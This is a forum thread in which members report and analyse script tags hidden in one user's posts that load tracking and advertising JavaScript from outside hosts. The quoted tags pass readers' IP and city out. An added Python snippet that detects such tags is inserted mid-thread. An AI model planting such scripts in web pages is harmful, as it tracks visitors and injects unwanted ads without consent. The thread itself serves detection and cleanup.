
Jon - something questionable

Sorry for not emailing, no access to my email right this sec to report this properly.

There is a new user signed up two days ago under the name "egptcountryboy"

Every post this user is making is embedded with a script that hyperlinks items on the page.  If you look at the source of his posts, you will find the following, which forces loading of a JavaScript script for an advertising company:

Code:

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7B40E1C7C6-37A4-4F48-9508-E7411BB63C75%7D"></script>
<script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&amp;pid=1032&amp;zoneid=10368&amp;cid=US&amp;rid=MD&amp;ccid=Crownsville&amp;ip=68.55.64.120"></script>



This probably needs to be dealt with.  Here are the two posts which need to be edited to remove the scripting:

http://figs4funforum.websitetoolbox.com/post/show_single_post?pid=1274342694&postcount=5

http://figs4funforum.websitetoolbox.com/post/show_single_post?pid=1274342761&postcount=1


Hope you're able to do something.

Jasson

What caution do you suggest for those who have not yet opened his posts?

There is a script file being posted in the posts, and it's referencing an IP address of a computer using Comcast cable in Crownsville, Maryland.  Looks to be an advertising script.  Very curious.  Submitting the source on the Javascript to a couple of security vendors to inspect.

My advice is ... don't click on the links inside his posts or any other subsequent members' posts on that page, simply put.

And for the new forum user above (Abraham/egptcountryboy), I'd recommend you go download a tool like MalwareBytes and perform a full scan on your system if you have no idea what I'm talking about.

NOTE:  NOBODY ELSE NEEDS TO SCAN THEIR SYSTEM.

Thanks Jason.
Now we can overcome the curiosity....

I'm checking on it. The poster seems legit. I deleted everything in the post, and replaced it with a clean text file, but the link returns. Same issue shows up in post by BLB, who we know is legit.

Still waiting on the script file to be dissected.  Will let you know what I find out.  It is true that there are links on two posts, but technically, any script will load once and affect everything on the page.

(I need to look at the source - it may be embedded in the user signature - can you check?)

  • BLB

What??? What is showing up in my posts?? I have a McAfee system to prevent any stuff like this. What do I do?

  • BLB

I am running Malwarebytes, the program Jason recommended. 

Blb legit? Lol sure. 

Barry is a SPY>>>>>>in the famous words of Charlie Brown AAGGGHHHHHHH...

  • BLB

I'm spying on the fig people so I can report back to the pomegranate people.
Seriously though, I am running the malware thing recommended by Jason, it's found nothing in nearly 2 hours but is still going. Anything I've posted on this forum was a picture taken from my cell phone. I don't know how these Malware or virus things work, not one clue, but I don't want to cause any problems for my friends or myself.   

  • BLB

The scan just completed, no malicious malware detected.
 

Yes, there is no malware, I'm talking about a tracking script which is embedded in every post that user makes.  It hyperlinks here:

http://loading-resource.com/50.js.php?i=%7B40E1C7C6-37A4-4F48-9508-E7411BB63C75%7D

If you click that link, you will see that your city and IP address are being supplied out to some arbitrary website, and it appears it allows the recipient to see information about *every* person who reads a thread he posts in.  It also appears to load the "TEXT ENHANCE" flash script that appears every time you mouse over an underlined word in one of the posts on the page.

I can't tell you how it's being done... I just know that it is directly tied to that specific user, the Javascript code is being inserted at the end of his posts, just above his signature line (you can't see it via the post, only by looking at the source code behind the actual webpage), and it's affecting the entire webpage; all posts on the same page as his.

I don't know what to do about it either, unfortunately.  Unfortunately, I don't have a lot of time to dig into this right now.

  • BLB

I downloaded the program you suggested, ran a full scan and it found nothing. I have McAfee and it updates automatically and again nothing.

Frankly, that sounds like an issue with some kind of tracking cookie?  Spybot, or some other anti-advertising program might be more of use.

Malware Bytes is such a program; Spybot S&D and MalwareBytes are both competent programs, both with their own perks.  MalwareBytes tends to do better with browser hijackers after an infection happens, Spybot S&D is better to prevent browser hijackers.

Confused why folks are scanning their computers?  There is no need, folks.  This has nothing to do with your system.  It appears either the user (egptcountryboy) is manually embedding tracking scripts into his posts, or he's infected with (and/or has installed) something that is automatically dropping this hidden scripting into his posts.

Just want to show what is going on.

This is the source code behind his first post (see attached image).

The portion of source code I highlighted between his name "-Abe" and his actual signature (everything below the ---------------) is the offending script call that appears to be causing the underlined links in everyone's posts.  After picking apart the linked script (*.js) that's linked between the end of his post content and his signature, it appears it's using Macromedia Flash to show the popups when you hover over the links.  If you run your browser with the Flash plugin off, it stops.

The script calls only exist in his posts, nobody else's.
The underlined links only show up in threads he has posted in, as a result of the script calls.
The scripts being called affect all posts inside a thread, not just his.
All of the script calls redirect people to an external search engine.

Reeks of advertising bot/rogue advertising.

 

Attached image: abescript.jpg
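As an added illustration of the check described in the post above (not code from the thread or from the forum software), a moderator could scan a post's stored HTML for script tags that load from outside the forum and list any visitor details passed in the URL. The allowlisted host, the function and variable names, and the sample post are assumptions made for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Assumption: the only host allowed to serve scripts inside post bodies.
ALLOWED_SCRIPT_HOSTS = {"figs4funforum.websitetoolbox.com"}
# Parameter names seen in the thread's snippet that carry visitor details.
VISITOR_PARAMS = {"ip", "cid", "rid", "ccid"}

# Constructed sample post, modelled on the snippet quoted in the thread
# (identifier shortened, IP replaced with a documentation address).
SAMPLE_POST = (
    '<p>Nice tree!</p><p>-Abe</p>'
    '<script type="text/javascript" '
    'src="http://loading-resource.com/50.js.php?i=%7BEXAMPLE-ID%7D"></script>'
    '<script type="text/javascript" '
    'src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js'
    '?pid=1032&amp;cid=US&amp;rid=MD&amp;ccid=Crownsville&amp;ip=203.0.113.7">'
    '</script><hr>signature text'
)


class _ScriptFinder(HTMLParser):
    """Collects every <script> tag that is inline or loads from another host."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src") or ""
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        if src and (not host or host in ALLOWED_SCRIPT_HOSTS):
            return  # relative URL or allowlisted host: not reported
        leaked = {k: v[0] for k, v in parse_qs(parts.query).items()
                  if k in VISITOR_PARAMS}
        self.findings.append({"kind": "external" if src else "inline",
                              "host": host, "visitor_params": leaked})


def scan_post(html_text):
    """Return one finding per suspicious <script> tag in a post body."""
    finder = _ScriptFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for finding in scan_post(SAMPLE_POST):
        print(finding)
```
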

  • BLB

Ok I responded to his post. So perhaps because of that it showed up as it sounds like you're saying it showed up in the whole thread. Anyway, Jon said something was showing up on my posts. Jason suggested Malwarebytes to the other guy, but I'm thinking I have a problem so I downloaded that and ran it. It found nothing. Just to set the record straight. 

Gonna keep my eye on you Barry, lol.

Jason, I noticed a link I am sure Herman2 did not choose to include in this thread. http://figs4funforum.websitetoolbox.com/post/Maltese-Falcon-5938125.

Edit: Never mind, I read that you figured this one out already. Funny it only links the word Ischia.
